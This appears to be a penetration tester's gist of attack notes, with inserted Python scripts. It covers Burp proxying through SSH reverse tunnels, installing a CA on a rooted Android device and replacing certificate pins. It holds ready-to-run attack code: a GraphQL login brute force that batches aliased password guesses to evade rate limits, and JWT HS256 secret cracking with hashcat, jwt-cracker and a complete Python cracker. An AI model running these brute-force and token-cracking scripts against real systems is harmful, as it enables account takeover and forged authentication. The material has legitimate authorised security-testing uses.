Sathish Kumar (sathishshan) - gists
Generate a self-signed certificate for the SAML app (RSA 2048, SHA-256, valid 365 days; -nodes leaves the private key unencrypted):
openssl req -x509 -sha256 -nodes -days 365 -newkey rsa:2048 -keyout privateKey.key -out certificate.crt
Refs:
https://faq.miniorange.com/knowledgebase/can-generate-certificate-saml-app/
https://stackoverflow.com/questions/48397927/where-to-get-a-saml-certificate
https://www.samltool.com/self_signed_certs.php
Remote Traffic to Localhost -> Ex: curl on a remote host proxied through a local Burp listener
Tunnel Establishment (reverse forward: port 8080 on the remote host -> Burp on local port 8080; -f background, -N no remote command, -T no tty):
ssh -fNT -R 8080:localhost:8080 username@IP
Test Run (on the remote host; -k because the remote host does not trust Burp's CA):
curl -svk https://www.google.com -x http://localhost:8080
-----------------------------------------------------------------------------------
Simple request catcher (the loop restarts the listener after every connection):
while true; do nc -l localhost 8888; done
curl localhost:8888
curl -F [email protected] -F [email protected] localhost:8888
GraphQL login brute force via aliased batching (run in the browser devtools console; copy() puts the generated selection set on the clipboard). Wrap the copied aliases in mutation { ... } before sending; the server answers every alias in one response, so one request carries the whole list:
copy(`123456,password,12345678,qwerty,123456789,12345,1234,111111,1234567,dragon,123123,baseball,abc123,football,monkey,letmein,shadow,master,666666,qwertyuiop,123321,mustang,1234567890,michael,654321,superman,1qaz2wsx,7777777,121212,000000,qazwsx,123qwe,killer,trustno1,jordan,jennifer,zxcvbnm,asdfgh,hunter,buster,soccer,harley,batman,andrew,tigger,sunshine,iloveyou,2000,charlie,robert,thomas,hockey,ranger,daniel,starwars,klaster,112233,george,computer,michelle,jessica,pepper,1111,zxcvbn,555555,11111111,131313,freedom,777777,pass,maggie,159753,aaaaaa,ginger,princess,joshua,cheese,amanda,summer,love,ashley,nicole,chelsea,biteme,matthew,access,yankees,987654321,dallas,austin,thunder,taylor,matrix,mobilemail,mom,monitor,monitoring,montana,moon,moscow`.split(',').map((element,index)=>`
bruteforce$index:login(input:{password: "$password", username: "<USERNAME>"}) {
token
success
}
`.replaceAll('$index',index).replaceAll('$password',element)).join('\n'));console.log("The query has been copied to the clipboard");
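The same alias-batching idea as a complete script, added here as an example (not code from the gist): it builds the batched mutation with proper string quoting and then maps the alias that reported success back to the password that produced it. The field names (login, token, success), the username placeholder, the short wordlist and the sample response are assumptions constructed for the demo.

```python
# Added example (not from the gist): build the aliased GraphQL login batch and
# find which alias succeeded in the server's response. The field names (login,
# token, success), the username and the sample response are assumptions.
import json

PASSWORDS = ["123456", "password", "qwerty", "letmein"]  # constructed short list


def build_batched_login(username, passwords):
    # One alias per candidate so a single request carries many login attempts
    # (a common way to sidestep per-request rate limiting). json.dumps quotes
    # and escapes the strings, so a password containing '"' cannot break the query.
    fields = [
        f'bruteforce{i}:login(input:{{password: {json.dumps(pw)}, username: {json.dumps(username)}}}) {{\n  token\n  success\n}}'
        for i, pw in enumerate(passwords)
    ]
    return "mutation {\n" + "\n".join(fields) + "\n}"


def find_hit(response_body, passwords):
    # Map the alias whose login reported success back to the password behind it.
    # Returns None when no alias succeeded or the response carried no data.
    data = json.loads(response_body).get("data") or {}
    for i, pw in enumerate(passwords):
        result = data.get(f"bruteforce{i}")
        if result and result.get("success") is True:
            return {"alias": f"bruteforce{i}", "password": pw, "token": result.get("token")}
    return None


# Constructed sample response: the third candidate succeeded.
SAMPLE_RESPONSE = json.dumps({"data": {
    "bruteforce0": {"token": None, "success": False},
    "bruteforce1": {"token": None, "success": False},
    "bruteforce2": {"token": "eyJhbGciOi...", "success": True},
    "bruteforce3": {"token": None, "success": False},
}})

if __name__ == "__main__":
    print(build_batched_login("<USERNAME>", PASSWORDS))
    print(find_hit(SAMPLE_RESPONSE, PASSWORDS))
```

Send the output of build_batched_login as the query field of a normal GraphQL POST; find_hit then reads the JSON body that comes back.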
HS256 - Weak Signing Key: Brute Force (mode 16500 is hashcat's JWT mode; the token is passed in full)
hashcat -a 0 -m 16500 <JWT TOKEN> /path/to/jwt.secrets.list
npm install -g jwt-cracker
jwt-cracker <token> [<alphabet>] [<maxLength>]
RS256 (not HS256) - Recovering the RSA public key from two tokens signed with the same key, to use it as the HMAC secret in an RS256 -> HS256 algorithm-confusion test:
https://github.com/silentsignal/rsa_sign2n/tree/release/standalone
HS256 - Signature (recompute it by hand to confirm a recovered secret; the HMAC input is the first two segments joined by a dot, with no trailing newline):
echo -n "<JWT Base64url encoded - Header.Payload>" | openssl dgst -sha256 -hmac '<SECRET>' -binary | openssl base64
The output is standard base64, e.g.:
SZf1eovdqV+1mo8rvI79UxQT3Ue/mJd3ipXu8XO01os=
Convert it to base64url before comparing with the token's third segment: change + to -, / to _, and drop the trailing = or == padding.
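The two HS256 notes above (brute-forcing a weak secret, and recomputing the signature with the base64 to base64url conversion) carried through in standard-library Python, added here as an example that is not part of the gist. The header, claims, secret and the small wordlist are constructed for the demo.

```python
# Added example (not from the gist): HS256 signing/verification, the manual
# base64 -> base64url conversion, and a wordlist brute force of a weak secret,
# all with the standard library. Secret, claims and WORDLIST are constructed.
import base64
import hashlib
import hmac
import json
from typing import Optional


def b64url_encode(raw: bytes) -> str:
    # Base64url without padding, as JWT segments require (+ -> -, / -> _, no '=').
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def b64url_decode(s: str) -> bytes:
    # Re-add the padding that JWT strips before decoding.
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def b64_to_b64url(std: str) -> str:
    # The manual conversion from the notes: + -> -, / -> _, drop '=' padding.
    return std.replace("+", "-").replace("/", "_").rstrip("=")


def hs256_sign(header: dict, payload: dict, secret: bytes) -> str:
    # Compact separators keep the encoded JSON the way most JWT libraries emit it.
    segs = [b64url_encode(json.dumps(x, separators=(",", ":")).encode()) for x in (header, payload)]
    signing_input = ".".join(segs).encode("ascii")  # "header.payload", no newline
    sig = hmac.new(secret, signing_input, hashlib.sha256).digest()
    return ".".join(segs + [b64url_encode(sig)])


def hs256_verify(token: str, secret: bytes) -> bool:
    h, p, s = token.split(".")
    expected = hmac.new(secret, f"{h}.{p}".encode("ascii"), hashlib.sha256).digest()
    # Constant-time comparison on the raw bytes, not on the base64 text.
    return hmac.compare_digest(expected, b64url_decode(s))


def crack_hs256(token: str, wordlist) -> Optional[str]:
    # Same idea as hashcat -m 16500 / jwt-cracker, for a short in-memory list:
    # recompute the HMAC for every candidate and compare with the token's signature.
    h, p, s = token.split(".")
    target = b64url_decode(s)
    signing_input = f"{h}.{p}".encode("ascii")
    for candidate in wordlist:
        mac = hmac.new(candidate.encode(), signing_input, hashlib.sha256).digest()
        if hmac.compare_digest(mac, target):
            return candidate
    return None


WORDLIST = ["123456", "password", "qwerty", "secret", "letmein"]  # constructed

if __name__ == "__main__":
    token = hs256_sign({"alg": "HS256", "typ": "JWT"}, {"sub": "alice", "admin": False}, b"secret")
    print(token)
    print(hs256_verify(token, b"secret"), hs256_verify(token, b"wrong"))
    print(crack_hs256(token, WORDLIST))
```

crack_hs256 is fine for a few thousand candidates; for real wordlists use hashcat as in the note, which does the same computation on the GPU.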
Install the Burp CA as a system CA on a rooted Android device (needs root and /system mounted read-write):
openssl x509 -inform der -in cacert.der -out burp.pem
openssl x509 -inform pem -subject_hash_old -in burp.pem
(the first line printed is the hash; the file in cacerts must be named <hash>.0, and -subject shows which CA an existing file belongs to)
openssl x509 -inform pem -subject -in 9a5ba575.0
mv burp.pem 93f6f67f.0
adb push 93f6f67f.0 /system/etc/security/cacerts
adb shell
(in the shell: chmod 644 the pushed file, then reboot so the trust store is reloaded)
Minimal TCP listener in Python (prints whatever the client sends until it disconnects):
import socket, sys, time

def listen(ip, port):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)  # allow quick restarts on the same port
    s.bind((ip, port))
    s.listen(1)
    print("Listening on port " + str(port))
    conn, addr = s.accept()
    print('Connection received from ', addr)
    while True:
        data = conn.recv(4096)
        if not data:  # empty read means the peer closed the connection
            break
        print(data.decode(errors='replace'))
    conn.close()
    s.close()

if __name__ == '__main__':
    listen(sys.argv[1], int(sys.argv[2]))
Adding/Replacing the public key pin in a mobile application (certificate pinning / fingerprint):
Generating the SHA-256 pin from the Burp cert:
// It extracts the public key (SubjectPublicKeyInfo, PEM) from the Burp CA certificate
$ openssl x509 -inform der -in burp_CA.der -pubkey -noout -out burp.pub
// It hashes the DER-encoded public key with SHA-256 and base64-encodes the digest (the sha256/... pin format used by OkHttp and Android's network security config)
$ openssl pkey -pubin -in burp.pub -outform der | openssl dgst -sha256 -binary | openssl base64
Tampermonkey/Greasemonkey userscript skeleton for auto-login (the @match pattern normally needs a path, e.g. a trailing /*, to match the pages you want):
// ==UserScript==
// @name         Login_MO
// @namespace    Auto_Login
// @description  Login_Auto
// @version      1.0
// @match        https://site.com
// @run-at       document-start
// ==/UserScript==
window.addEventListener('load', function() {
  // form-filling and submit steps go here
});